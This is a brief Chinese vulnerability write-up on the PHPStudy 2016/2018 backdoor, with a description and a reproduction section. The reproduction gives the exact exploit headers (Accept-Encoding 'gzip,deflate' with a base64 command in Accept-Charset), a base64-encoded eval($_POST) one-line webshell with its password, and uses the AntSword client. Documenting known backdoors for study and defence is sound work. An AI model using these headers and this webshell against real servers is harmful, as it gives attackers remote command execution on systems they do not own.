0x01描述

Phpstudy是一款PHP调试环境的程序集成包,集成了最新的Apache、PHP、phpMyAdmin、ZendOptimizer等多款软件一次性安装,无需配置,即装即用。由于其免费且方便的特性,在国内有着近百万的PHP语言学习者、开发者用户。

后门名称:Phpstudy后门

威胁等级:严重

影响范围:Phpstudy 2016、phpstudy2018

后门类型:C&C、命令执行

利用难度:极易

0x02复现

利用工具:中国蚁剑

phpstudy:2016 PHP-5.4.45

Accept-Encoding:gzip,deflate
Accept-Charset:base64加密执行的命令
一句话木马:ZXZhbCgkX1BPU1RbZ10pOw==
密码:g
配置HTTP消息头

连接成功

参考&季风 https://www.secquan.org/Notes/1070341

最后修改:2021 年 03 月 09 日
© 允许规范转载
如果觉得我的文章对你有用,请随意赞赏